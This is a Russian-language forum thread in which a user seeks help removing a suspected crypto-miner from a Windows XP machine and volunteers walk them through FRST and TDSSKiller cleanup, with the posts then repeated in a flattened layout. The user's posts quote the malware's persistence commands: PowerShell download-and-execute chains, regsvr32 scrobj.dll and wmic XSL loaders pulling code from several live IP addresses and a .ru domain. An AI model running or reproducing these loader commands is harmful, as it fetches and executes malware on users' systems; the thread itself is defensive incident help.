Поймал вирус (предположительно майнер)

@zxzx777 · Регистрация: 30.12.2017

Author24 — интернет-сервис помощи студентам

Здравствуйте. Антивирус в системе не стоит, т.к. слабенькая.
На винчестере три раздела и два Windows - XP и Vista. В основном работаю на С: под ХР.
Поймал вирус (предположительно майнер) еще летом 2021 года. Прошло уже больше 3-х месяцев.
Грузит систему периодически до 100%.
Часть вируса удалил в начале осени, но вижу, что не всё. Удалил (возможно не всё перечислил):
[1].txt
a.bat
conhoy.exe
CONHOY.EXE-1EC51B50.pf11
shell.rar
c:\WINDOWS\Debug\item.dat
c:\WINDOWS\inf\aspnet\lsma12.exe
c:\System Volume Information\_restore{6B76C70F-5D28-4A66-9153-CE979AEAF7D5}\RP129\A0091495.INI 62байта
??? c:\WINDOWS\system32\n1.dat

Служба apzZ
C:\WINDOWS\system32\regsvr32.exe
apzZ 12% apzZ Auto on startup Сервер регистрации, (C) Microsoft Корпорация Майкрософт cmd /c regsvr32 /s /u /n /i:http://185.47.128.124:8124/m17010.txt scrobj.dll 2021-08-29 14:07 own process

Trojan.BitCoinMiner.TskLnk, C:\WINDOWS\inf\aspnet\lsma12.exe

В процессе работы над отчетом блокировался доступ к вэб-сайтам антивирусов.
Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст.
Также зависала система и испортился Malwarebytes.

По теме загрузки отчета есть несколько замечаний. При попытке запустить AutoLogger (скачанный по ссылке из Правил оформления) пишет "Пожалуйста, скачайте свежую версию автосборщика логов". В файле Date.ini из папки AutoLogger\AV поменял вручную дату на более близкую - только тогда AutoLogger запустился. Думаю, нужно в выложенном для скачивания архиве периодически менять дату в файле Date.ini на более актуальную.
И ещё. Базы обновить невозможно, так как пункт обновления в меню Файл не активен.

Буду благодарен за помощь.

@thyrex · 07.01.2022, 18:40

Сообщение от zxzx777

Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст

на время сбора логов не нужно просто заниматься и другими делами параллельно на компьютере. Это всего лишь проверка на кейлоггеры.

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

@zxzx777 · 07.01.2022, 19:56 **[ТС]**

Проблемы с печатаньем текста заметил до сбора логов.
Ещё вопрос - у меня почему то две учетные записи Administrator. Я вроде вторую не создавал. Всегда работал под Isvaripati. Может это относится к вирусу? Можна Admin удалить?

@thyrex · 07.01.2022, 21:32

Сообщение от zxzx777

Проблемы с печатаньем текста заметил до сбора логов.

Да что Вы говорите. Уж я-то знаю хорошо поведение AVZ при сборе логов.

Ничего необычного в системе, кроме мусора. Да и система вряд ли лицензионная.

Сообщение от zxzx777

Можна Admin удалить?

Возможно это встроенный Администратор. Просто отключите.

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Код

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {0f7f9062-5667-11ec-a40d-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {43c74f4a-bcc0-11e3-9755-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {4f74d530-d7ac-11ea-a250-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {7232c450-2a53-11e5-9a48-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {bfaadc08-9df1-11e8-a06e-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {cbb734b0-d89e-11e2-95b4-001c2689cc88} - G:\AutoRun.exe
HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {f6447094-d899-11e2-95b1-001c2689cc88} - G:\AutoRun.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
Policies: C:\Documents and Settings\All Users\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Documents and Settings\Isvaripati\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll [2011-11-10] () <==== ATTENTION [zero byte File/Folder]
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Алминистратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

Обратите внимание: будет выполнена перезагрузка компьютера.

@zxzx777 · 08.01.2022, 17:46 **[ТС]**

"Ничего необычного в системе" не видно, но компьютер нагружается.
svchost.exe занимает необычно много памяти в процессах.
В файл hosts сама добавляется строка с блокировкой сайта Malwarebytes (возможно в момент начала работы программы)
И удаленные строки из C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA на следующий день снова на месте:
md /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://155.94.235.39:8039/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"

@thyrex · 08.01.2022, 17:49

Сообщение от zxzx777

И удаленные строки

И сейчас на месте? Если так, то не занимайтесь самолечением и сделайте новые логи Autologger

@zxzx777 · 08.01.2022, 18:16 **[ТС]**

Эти логи актуальные (строки присутствуют в файле OBJECTS.DATA).
Удалял позавчера вечером, а вчера утром они уже были снова в файле.
Такое впечатление, что что то вмешивается в работу антивирусных (сборщиков логов) программ. Когда запускал AVZ позавчера, он показывал больше угроз. Я как раз вникал в проблемму, практически ничего не удалял. Только явные строки из OBJECTS.DATA. Я теперь и AVZ и Malwarebytes ничего не находят практически.

Вопрос. Скачал ряд программ из вашего раздела "Инструментарий консультанта", проверяю на VirusTotal и везде показывает несколько вирусов в файлах. Как так может быть?

Добавлено через 3 минуты
https://www.virustotal.com/gui... ?nocache=1
Ссылка для примера.

@thyrex · 08.01.2022, 19:24

Сообщение от zxzx777

проверяю на VirusTotal и везде показывает несколько вирусов в файлах

Нет в наших инструментах вирусов

Файл hosts по прежнему изменен?

@zxzx777 · 08.01.2022, 19:44 **[ТС]**

Я строчку в hosts несколько раз удалял вручную, но она спонтанно появляется.

@thyrex · 08.01.2022, 21:06

Я спрашивал о ее наличии в настоящий момент

@zxzx777 · 08.01.2022, 21:55 **[ТС]**

Даже не знаю, как ответить. Она может появиться через несколько минут после удаления. Сейчас, на момент выключения компа не было.

@Sandor · 09.01.2022, 15:27

Подготовьте лог uVS.

@zxzx777 · 09.01.2022, 19:28 **[ТС]**

Сделал

@Sandor · 10.01.2022, 09:16

Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку;
Запустите файл TDSSKiller.exe.
Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию.
В процессе проверки могут быть обнаружены объекты двух типов:
- вредоносные (точно было установлено, какой вредоносной программой поражен объект);
- подозрительные (тип вредоносного воздействия точно установить невозможно).
По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием.
Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить.
Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить).
Самостоятельно без указания консультанта ничего не удаляйте!!!
После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат.
Прикрепите лог утилиты к своему следующему сообщению.

По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\).
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt
Например, C:\TDSSKiller.3.1.0.28_11.10.2020_15.52.14_log.txt

@zxzx777 · 10.01.2022, 13:00 **[ТС]**

На всякий случай сделал 2 лога:
1. Без изменения настроек.
2. С галочкой на "Проверять цифровые сертификаты".

@Sandor · 10.01.2022, 13:32

Удалите старые и соберите новые логи FRST.txt и Addition.txt

@zxzx777 · 10.01.2022, 15:26 **[ТС]**

Еще раз отмечу, что поймал вирус еще летом 2021 года. Прошло уже больше 3-х месяцев.

@Sandor · 10.01.2022, 15:42

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

Отключите до перезагрузки антивирус.

Выделите следующий код:

Код

Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
Policies: C:\Documents and Settings\All Users\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Documents and Settings\Isvaripati\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Documents and Settings\Admin\NTUSER.pol: Restriction <==== ATTENTION
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:MSFT_UCScenarioControl.Name=\"Microsoft WMI Updating Consumer Scenario Control\"",Filter="\\.\root\subscription:__EventFilter.Name=\"Microsoft WMI Updating Consumer Scenario Control\"::
WMI:subscription\__EventFilter->Microsoft WMI Updating Consumer Scenario Control::[Query => SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'MSFT_UCScenario']
HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION
Hosts:
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Деинсталлируйте больше не поддерживаемый:

Adobe Flash Player 11 ActiveX & Plugin 32-bit

и устаревшую со множеством уязвимостей

Java(TM) 6 Update 30

@zxzx777 · 10.01.2022, 16:19 **[ТС]**

Весело, после первого отчета файл FRST.exe оказался у себя в карантине. Воспользовался копией.
После скрипта комп сам не перегрузился. Перегрузил вручную.
После перезагрузки все также гудит.

@zxzx777 · 10.01.2022, 16:22 **[ТС]**

Деинсталлировать можно без потери функциональности? Или Flash и Java уже вообще не актуальны? Удалять через Удаление программ или скачивать спецутилиты для полной деинсталяции?

@thyrex 13112 / 7261 / 1537 Регистрация: 06.09.2009 Сообщений: 26,506
	07.01.2022, 18:40	2
	Сообщение от zxzx777 Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст на время сбора логов не нужно просто заниматься и другими делами параллельно на компьютере. Это всего лишь проверка на кейлоггеры. Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. 1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением. 2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan (Сканировать). 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению. 0

@thyrex 13112 / 7261 / 1537 Регистрация: 06.09.2009 Сообщений: 26,506
	08.01.2022, 17:49	6
	Сообщение от zxzx777 И удаленные строки И сейчас на месте? Если так, то не занимайтесь самолечением и сделайте новые логи Autologger 0

@zxzx777 1 / 1 / 0 Регистрация: 30.12.2017 Сообщений: 24
	08.01.2022, 18:16 [ТС]	7
	Эти логи актуальные (строки присутствуют в файле OBJECTS.DATA). Удалял позавчера вечером, а вчера утром они уже были снова в файле. Такое впечатление, что что то вмешивается в работу антивирусных (сборщиков логов) программ. Когда запускал AVZ позавчера, он показывал больше угроз. Я как раз вникал в проблемму, практически ничего не удалял. Только явные строки из OBJECTS.DATA. Я теперь и AVZ и Malwarebytes ничего не находят практически. Вопрос. Скачал ряд программ из вашего раздела "Инструментарий консультанта", проверяю на VirusTotal и везде показывает несколько вирусов в файлах. Как так может быть? Добавлено через 3 минуты https://www.virustotal.com/gui... ?nocache=1 Ссылка для примера. 0

@thyrex 13112 / 7261 / 1537 Регистрация: 06.09.2009 Сообщений: 26,506
	08.01.2022, 19:24	8
	Сообщение от zxzx777 проверяю на VirusTotal и везде показывает несколько вирусов в файлах Нет в наших инструментах вирусов Файл hosts по прежнему изменен? 0

@zxzx777 1 / 1 / 0 Регистрация: 30.12.2017 Сообщений: 24
	08.01.2022, 19:44 [ТС]	9
	Я строчку в hosts несколько раз удалял вручную, но она спонтанно появляется. 0

@thyrex 13112 / 7261 / 1537 Регистрация: 06.09.2009 Сообщений: 26,506
	08.01.2022, 21:06	10
	Я спрашивал о ее наличии в настоящий момент 0

@zxzx777 1 / 1 / 0 Регистрация: 30.12.2017 Сообщений: 24
	08.01.2022, 21:55 [ТС]	11
	Даже не знаю, как ответить. Она может появиться через несколько минут после удаления. Сейчас, на момент выключения компа не было. 0

@Sandor 21567 / 15518 / 2989 Регистрация: 08.10.2012 Сообщений: 63,089
	09.01.2022, 15:27	12
	Подготовьте лог uVS. 0

@Sandor 21567 / 15518 / 2989 Регистрация: 08.10.2012 Сообщений: 63,089
	10.01.2022, 09:16	14
	Скачайте архив TDSSKiller.zip и распакуйте его в отдельную папку; Запустите файл *TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. Для вредоносных объектов утилита автоматически определяет действие: Лечить* или Удалить. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). Самостоятельно без указания консультанта ничего не удаляйте!!! После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. Прикрепите лог утилиты к своему следующему сообщению. По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\). Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.3.1.0.28_11.10.2020_15.52.14_log.txt 0

@Sandor 21567 / 15518 / 2989 Регистрация: 08.10.2012 Сообщений: 63,089
	10.01.2022, 13:32	16
	Удалите старые и соберите новые логи FRST.txt и Addition.txt 0

@Sandor 21567 / 15518 / 2989 Регистрация: 08.10.2012 Сообщений: 63,089
	10.01.2022, 15:42	18
	Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены. Отключите до перезагрузки антивирус. Выделите следующий код: Код Start:: SystemRestore: On CreateRestorePoint: CloseProcesses: Policies: C:\Documents and Settings\All Users\NTUSER.pol: Restriction <==== ATTENTION Policies: C:\Documents and Settings\Isvaripati\NTUSER.pol: Restriction <==== ATTENTION Policies: C:\Documents and Settings\Admin\NTUSER.pol: Restriction <==== ATTENTION WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:MSFT_UCScenarioControl.Name=\"Microsoft WMI Updating Consumer Scenario Control\"",Filter="\\.\root\subscription:__EventFilter.Name=\"Microsoft WMI Updating Consumer Scenario Control\":: WMI:subscription\__EventFilter->Microsoft WMI Updating Consumer Scenario Control::[Query => SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'MSFT_UCScenario'] HKLM\...\batfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <==== ATTENTION Hosts: EmptyTemp: Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Деинсталлируйте больше не поддерживаемый: Adobe Flash Player 11 ActiveX & Plugin 32-bit и устаревшую со множеством уязвимостей Java(TM) 6 Update 30 0

@zxzx777 1 / 1 / 0 Регистрация: 30.12.2017 Сообщений: 24
	10.01.2022, 16:22 [ТС]	20
	Деинсталлировать можно без потери функциональности? Или Flash и Java уже вообще не актуальны? Удалять через Удаление программ или скачивать спецутилиты для полной деинсталяции? 0